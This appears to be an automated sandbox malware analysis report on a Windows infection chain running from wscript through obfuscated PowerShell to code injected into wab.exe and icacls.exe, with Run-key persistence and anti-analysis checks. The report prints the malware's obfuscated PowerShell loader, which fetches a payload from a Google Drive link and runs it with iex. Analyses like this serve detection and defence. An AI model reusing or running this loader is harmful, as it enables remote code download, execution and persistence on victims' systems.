Source: C:\Windows\SysWOW64\icacls.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\IkhhjpqkuSBzOMxFOUjnLtXVXvlcwbxQtzqFeoWyOeZdOsgWYMvzhFIgRSISNBlgioszqXJbklLnku\sLGpONHtWjN.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\IkhhjpqkuSBzOMxFOUjnLtXVXvlcwbxQtzqFeoWyOeZdOsgWYMvzhFIgRSISNBlgioszqXJbklLnku\sLGpONHtWjN.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Program Files (x86)\IkhhjpqkuSBzOMxFOUjnLtXVXvlcwbxQtzqFeoWyOeZdOsgWYMvzhFIgRSISNBlgioszqXJbklLnku\sLGpONHtWjN.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files (x86)\IkhhjpqkuSBzOMxFOUjnLtXVXvlcwbxQtzqFeoWyOeZdOsgWYMvzhFIgRSISNBlgioszqXJbklLnku\sLGpONHtWjN.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\IkhhjpqkuSBzOMxFOUjnLtXVXvlcwbxQtzqFeoWyOeZdOsgWYMvzhFIgRSISNBlgioszqXJbklLnku\sLGpONHtWjN.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Program Files (x86)\IkhhjpqkuSBzOMxFOUjnLtXVXvlcwbxQtzqFeoWyOeZdOsgWYMvzhFIgRSISNBlgioszqXJbklLnku\sLGpONHtWjN.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptdlg.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msoert2.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msimg32.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptui.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msftedit.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: actxprxy.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptdlg.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msoert2.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msimg32.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptui.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msftedit.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Windows\SysWOW64\msftedit.dll Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2595475474.0000000007079000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: wab.exe, 0000000B.00000003.2681714587.000000001FF3E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.2786126386.00000000200F0000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: ore.pdb0 source: powershell.exe, 00000005.00000002.2595475474.000000000714B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: wab.exe, wab.exe, 0000000B.00000003.2681714587.000000001FF3E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.2786126386.00000000200F0000.00000040.00001000.00020000.00000000.sdmp, icacls.exe
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2599815914.0000000007F00000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: m.Core.pdbn source: powershell.exe, 00000005.00000002.2595475474.000000000714B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb/y source: powershell.exe, 00000005.00000002.2599815914.0000000007F00000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000005.00000002.2584189007.0000000002BC7000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: .Run("POWERSHELL "$Spleniform225 = 1;$Figurskaaret='Substrin';$Figurskaaret+='g';Function Nepotistic($Mistnkeligt){$Con", "0")
Source: Yara match File source: 0000000B.00000002.2770622512.0000000002F30000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2600779030.0000000008E90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2600596089.0000000008400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2590325281.000000000577D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2709902493.000001569006C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Depolarising33)$global:Tjurhanen = [System.Text.Encoding]::ASCII.GetString($Gennemtrnger)$global:Whitlock=$Tjurhanen.substring(314661,28592)<#Mineres Ggepulvere Orthographising Bulde
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Salpeterets $Daddle $Throaty), (Incorrectly @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Ngsteligheds = [AppDomain]::CurrentDomain.GetAssemblies()$globa
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Handicappers)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Djaevlekulterne, $false).DefineType($Europew
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Depolarising33)$global:Tjurhanen = [System.Text.Encoding]::ASCII.GetString($Gennemtrnger)$global:Whitlock=$Tjurhanen.substring(314661,28592)<#Mineres Ggepulvere Orthographising Bulde
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Spleniform225 = 1;$Figurskaaret='Substrin';$Figurskaaret+='g';Function Nepotistic($Mistnkeligt){$Conchuela=$Mistnkeligt.Length-$Spleniform225;For($Autometamorphosis=5; $Autometamorphosis -lt $Conchuela; $Autometamorphosis+=(6)){$Aversioners+=$Mistnkeligt.$Figurskaaret.Invoke($Autometamorphosis, $Spleniform225);}$Aversioners;}function Enrens($Klippehules135){&($grazable) ($Klippehules135);}$Wedelns=Nepotistic 'JuleeM Spiro NnnezLuthei In elDecenlTjuruakiloj/,itri5Euc l. Tuff0Chemi ,rond(PreciWTri,hiRoscon TreedAggraoElectwHabudsViv,e AboriNAartuTChae. Bekos1Babit0Kmpen.Inarm0 Mono;Dokum InnhoWbegrdiSkrydn,riva6 Bege4Sundh; Diag BenegxOvers6.umss4Sedim;Al id umbrOmforvOutwe:Stunt1Towns2Riddi1 ,osi.Spise0Dalc ) I,du UnintGE.itueDaakac Koffk KnigoCircu/,lnsn2.ount0Paahi1infur0 Effe0catal1udmat0D,wry1For o TeleFB,udbiUdst,r FormePart fKuponoduplixRedni/Part.1P.stn2 Slau1 Lase.Nonec0Milie ';$Bombiccite240=Nepotistic ' PdatURekursVarieeTriumrSmitt- FinfALog.egMisape P,ctnDomest Stor ';$Charger=Nepotistic ' uffohTest t Stent GranpLnmodsKa.to:rekto/Marli/Omnitd Uvilr Depridelsivanhugeves,i.BeirugColl o madro KlokgBeriglTeleuePun.i. Brysc H.tpo lempmSkeed/ Famiu,alsscSh pp?TungteMbelpxNicetptufteoPerivr E entCleme=Ana.sdTr,ldo Snknw Drean NonclD stooproviaLucradGo,sf&U.wraiDistodHindu=verse1Lakmuy Ber,sEmilsXM.rioS .nylWProgrc UgelkSi.de_ Bares p tihGobblf Jac,s V,riiDi stVBagerSI.nijvDuffbxVelv.1SlageUSit,sk UrolpPrintRTetraU Tyfu2VideoRSc,ot4VelarF Sa,kJTvrsk7 AfnakInscr8DemonZBenin ';$Indtgters=Nepotistic 'Aummb>Overe ';$grazable=Nepotistic 'NematiRe ule Yv rxHas.e ';$Skatteprocenters = Nepotistic 'SynsfeSmertcMytolh ManioPostb syste% Undea Skr pRlighpProcedG.umpa KbentSim laBioni%Socia\MenueU R tmd NorijWheezvOkto,nTurbueMonot. 
BahrMSubstaSymboi Fo k .ill&Pl,dg&Basar ObdureKur,ucTailbhHymenoCzari Ansig$Stil, ';Enrens (Nepotistic 'Josua$Um,akgGenialprevooCent.bDir.saTrdokl Gang: imalUalternKaithcdalevaWaltzvAa ele,gterranklanReheaoDispeuMontas Y arlBuffeyGlot.=Aften( Outgc IndemDagpld Co.p ,isav/EoniacPlagi .rek$StemmSBeredkLjendaSkrmmt.ormitVapo.eCentipOpsmnr eninoSubmicUnsules aglnSchultDesceeNedblrAnthrsF,uep) Lept ');Enrens (Nepotistic 'Selvs$TaarngPrerelUn.wioTeatebGall,aS atkl,dslu:ForbeS M notD stauFor efstinkf intriTentlnunseneFaglrsFikses Grim=Zaddi$ TempC B,reh BalaaThimbrLednig PerqeAcridr nexp.Serassfi.kapInvarlProbliBe,ent,aris(Venog$BacteI tligngabardAbandtJa,nig Horot.ndele CharrDi.gnsMydri)P.dic ');$Charger=$Stuffiness[0];Enrens (Nepotistic 'Tornf$ Palpg,paltlPreatoSp.llbcarp.a ,rtllSamvi:F,rvaFThundrKap taCemetndi,dlkStokklVarebiIntran Int,=RedseN ViceeBoligwDiarb-,latwOBamsebOmbytjNonsyeForlncVal.otStrea OverrSArnauy KulksImmuttJordreFr nkmBeren.UninwNStoreeKa ketTnger.Ep,grWOver,eOplgnbregenC Lr,ilNu,rei TroseTrompnBargetToles ');Enrens (Nepotistic ' Ovip$F.rmaFTrekorPett aKor enUnstokEndo,lAndefi ,aranStren.sta
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Spleniform225 = 1;$Figurskaaret='Substrin';$Figurskaaret+='g';Function Nepotistic($Mistnkeligt){$Conchuela=$Mistnkeligt.Length-$Spleniform225;For($Autometamorphosis=5; $Autometamorphosis -lt $Conchuela; $Autometamorphosis+=(6)){$Aversioners+=$Mistnkeligt.$Figurskaaret.Invoke($Autometamorphosis, $Spleniform225);}$Aversioners;}function Enrens($Klippehules135){&($grazable) ($Klippehules135);}$Wedelns=Nepotistic 'JuleeM Spiro NnnezLuthei In elDecenlTjuruakiloj/,itri5Euc l. Tuff0Chemi ,rond(PreciWTri,hiRoscon TreedAggraoElectwHabudsViv,e AboriNAartuTChae. Bekos1Babit0Kmpen.Inarm0 Mono;Dokum InnhoWbegrdiSkrydn,riva6 Bege4Sundh; Diag BenegxOvers6.umss4Sedim;Al id umbrOmforvOutwe:Stunt1Towns2Riddi1 ,osi.Spise0Dalc ) I,du UnintGE.itueDaakac Koffk KnigoCircu/,lnsn2.ount0Paahi1infur0 Effe0catal1udmat0D,wry1For o TeleFB,udbiUdst,r FormePart fKuponoduplixRedni/Part.1P.stn2 Slau1 Lase.Nonec0Milie ';$Bombiccite240=Nepotistic ' PdatURekursVarieeTriumrSmitt- FinfALog.egMisape P,ctnDomest Stor ';$Charger=Nepotistic ' uffohTest t Stent GranpLnmodsKa.to:rekto/Marli/Omnitd Uvilr Depridelsivanhugeves,i.BeirugColl o madro KlokgBeriglTeleuePun.i. Brysc H.tpo lempmSkeed/ Famiu,alsscSh pp?TungteMbelpxNicetptufteoPerivr E entCleme=Ana.sdTr,ldo Snknw Drean NonclD stooproviaLucradGo,sf&U.wraiDistodHindu=verse1Lakmuy Ber,sEmilsXM.rioS .nylWProgrc UgelkSi.de_ Bares p tihGobblf Jac,s V,riiDi stVBagerSI.nijvDuffbxVelv.1SlageUSit,sk UrolpPrintRTetraU Tyfu2VideoRSc,ot4VelarF Sa,kJTvrsk7 AfnakInscr8DemonZBenin ';$Indtgters=Nepotistic 'Aummb>Overe ';$grazable=Nepotistic 'NematiRe ule Yv rxHas.e ';$Skatteprocenters = Nepotistic 'SynsfeSmertcMytolh ManioPostb syste% Undea Skr pRlighpProcedG.umpa KbentSim laBioni%Socia\MenueU R tmd NorijWheezvOkto,nTurbueMonot. 
BahrMSubstaSymboi Fo k .ill&Pl,dg&Basar ObdureKur,ucTailbhHymenoCzari Ansig$Stil, ';Enrens (Nepotistic 'Josua$Um,akgGenialprevooCent.bDir.saTrdokl Gang: imalUalternKaithcdalevaWaltzvAa ele,gterranklanReheaoDispeuMontas Y arlBuffeyGlot.=Aften( Outgc IndemDagpld Co.p ,isav/EoniacPlagi .rek$StemmSBeredkLjendaSkrmmt.ormitVapo.eCentipOpsmnr eninoSubmicUnsules aglnSchultDesceeNedblrAnthrsF,uep) Lept ');Enrens (Nepotistic 'Selvs$TaarngPrerelUn.wioTeatebGall,aS atkl,dslu:ForbeS M notD stauFor efstinkf intriTentlnunseneFaglrsFikses Grim=Zaddi$ TempC B,reh BalaaThimbrLednig PerqeAcridr nexp.Serassfi.kapInvarlProbliBe,ent,aris(Venog$BacteI tligngabardAbandtJa,nig Horot.ndele CharrDi.gnsMydri)P.dic ');$Charger=$Stuffiness[0];Enrens (Nepotistic 'Tornf$ Palpg,paltlPreatoSp.llbcarp.a ,rtllSamvi:F,rvaFThundrKap taCemetndi,dlkStokklVarebiIntran Int,=RedseN ViceeBoligwDiarb-,latwOBamsebOmbytjNonsyeForlncVal.otStrea OverrSArnauy KulksImmuttJordreFr nkmBeren.UninwNStoreeKa ketTnger.Ep,grWOver,eOplgnbregenC Lr,ilNu,rei TroseTrompnBargetToles ');Enrens (Nepotistic ' Ovip$F.rmaFTrekorPett aKor enUnstokEndo,lAndefi ,aranStren.sta
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD348B00BD pushad ; iretd 2_2_00007FFD348B00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD348B7967 push ebx; retf 2_2_00007FFD348B796A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_043BB750 pushad ; ret 5_2_043BB75D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_073608C2 push eax; mov dword ptr [esp], ecx 5_2_07360AC4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_07360AB8 push eax; mov dword ptr [esp], ecx 5_2_07360AC4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201209AD push ecx; mov dword ptr [esp], ecx 11_2_201209B6
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F309AD push ecx; mov dword ptr [esp], ecx 13_2_02F309B6
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_003A41D1 push edi; retf 13_2_003A4223
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_003A4215 push edi; retf 13_2_003A4223
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_003A266E push eax; iretd 13_2_003A2670
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_003A8A22 push edx; iretd 13_2_003A8A23
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_003AABC8 push B2CD0983h; ret 13_2_003AABCE
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_003AEE37 push FFFFFFE1h; iretd 13_2_003AEE3D
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_00394E47 push eax; ret 13_2_00394E52
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_00390FFA push edi; ret 13_2_00390FFC
Source: C:\Windows\SysWOW64\icacls.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ML8XFNQ
Source: C:\Program Files (x86)\Windows Mail\wab.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Program Files (x86)\IkhhjpqkuSBzOMxFOUjnLtXVXvlcwbxQtzqFeoWyOeZdOsgWYMvzhFIgRSISNBlgioszqXJbklLnku\sLGpONHtWjN.exe Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\SysWOW64\icacls.exe"
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20161843 rdtsc 11_2_20161843
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6301 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3558 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6450 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3273 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe API coverage: 0.3 %
Source: C:\Windows\SysWOW64\icacls.exe API coverage: 3.0 %
Source: C:\Windows\System32\wscript.exe TID: 6052 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1484 Thread sleep time: -3689348814741908s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3688 Thread sleep count: 6450 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3688 Thread sleep count: 3273 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5868 Thread sleep time: -4611686018427385s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe TID: 6684 Thread sleep time: -50000s >= -30000s Jump to behavior
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\icacls.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_003AB130 FindFirstFileW,FindNextFileW,FindClose, 13_2_003AB130
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: powershell.exe, 00000002.00000002.2726435703.00000156FCD16000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWaa%SystemRoot%\system32\mswsock.dllform225);}$Aversioners;}function Enrens($Klippehules135){&($grazable) ($Klippehules135);}$Wedelns=Nepotistic 'JuleeM Spiro NnnezLuthei In elDecenlTjuruakiloj/,itri5Euc l. Tuff0Chemi ,rond(PreciWTri,hiRoscon TreedAggraoElectwHaQ
Source: wab.exe, 0000000B.00000002.2772002639.0000000004367000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW A<
Source: wscript.exe, 00000000.00000003.2083975306.0000020D16745000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2093730324.0000020D16742000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2097511143.0000020D16742000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2085394323.0000020D16745000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2085148892.0000020D166C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2085966002.0000020D16745000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2094838881.0000020D16742000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2085148892.0000020D16745000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2085623443.0000020D166E9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2097375103.0000020D166E9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2093730324.0000020D166E9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000000.00000003.2094838881.0000020D16742000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\O
Source: wscript.exe, 00000000.00000002.2097511143.0000020D1673B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}<
Source: wscript.exe, 00000000.00000003.2083975306.0000020D16745000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2093730324.0000020D16742000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2097511143.0000020D16742000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2085394323.0000020D16745000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2085966002.0000020D16745000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2094838881.0000020D16742000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2085148892.0000020D16745000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe Process queried: DebugPort Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20161843 rdtsc 11_2_20161843
